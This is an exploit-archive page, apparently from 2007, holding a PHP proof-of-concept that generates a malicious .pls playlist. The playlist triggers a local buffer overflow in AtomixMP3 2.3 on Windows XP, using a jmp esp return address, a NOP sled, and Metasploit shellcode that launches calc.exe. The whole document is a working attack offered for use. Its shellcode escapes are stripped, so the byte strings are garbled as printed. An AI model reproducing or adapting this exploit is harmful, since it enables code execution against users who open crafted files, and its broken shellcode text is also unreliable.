Home / os / solaris

atomix23-overflow.txt

Posted on 06 September 2007

<?php /* AtomixMP3 2.3 (pls File) Local Buffer OverFlow ret addr -> 0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002 exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ] By : 0x58 greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit Moroccan Hackers ! */ # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84". "xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d". "xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91". "x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5". "x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe". "x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc". "x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53". "xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0". "xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc". "xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0". "xe1xd1xfexd8"; $bof = str_repeat("A",516)."x40x45x39x77".str_repeat("x90",10).$shellcode; $filename = "atomix.pls"; $file = fopen($filename,"w+"); fputs($file,"[playlist] "); fputs($file,"File1=".$bof." "); fputs($file,"Title1=".$bof." "); fputs($file,"Length1=".strlen($bof)." "); fputs($file,"NumberOfEntries=1"); fputs($file,"Version=2"); fclose($file); echo "Exploit generated in : ".$filename."<br>"; ?>

 

TOP